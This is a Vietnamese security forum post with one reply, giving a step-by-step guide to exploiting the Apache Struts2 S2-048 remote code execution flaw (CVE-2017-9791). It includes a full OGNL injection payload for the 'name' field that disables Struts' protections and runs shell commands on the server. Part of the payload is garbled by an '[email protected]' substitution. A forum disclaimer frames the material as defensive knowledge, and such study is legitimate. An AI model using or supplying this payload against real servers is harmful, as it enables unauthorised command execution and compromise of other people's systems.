CVE-2017-9791: Apache Struts2 (S2-048) remote code execution vulnerability

DDos

VIP Members
22/10/2013
524
2.191 bài viết
CVE-2017-9791: Apache Struts2 (S2-048) remote code execution vulnerability
Trong bài viết này mình sẽ hướng dẫn các bạn khai thác lỗ hổng remote code trong Apache Struts2.
Thông tin về lỗ hổng CVE-2017-9791, các bạn có thể tham khảo tại đây.

  1. Tìm kiếm struts1 intergeration trên hệ thống apache server.
    eXL8RQb.png
  2. Truy cập vào đường dẫn, như hình dưới
    LIrivrI.png
  3. Sử dụng BurpSuite để chặn và thay đổi POST request
    9959b0aa-8f8a-462c-bcca-40927cdf6ffe
    8eulJly.png
  4. Thay đổi giá trị name bằng payload

    %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
    6zzdNO2.png








Demo
 
Cái chỗ ô vuông đỏ có phải là ký tự " : ( " phải không bác @DDos
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: DDos
Comment
Bên trên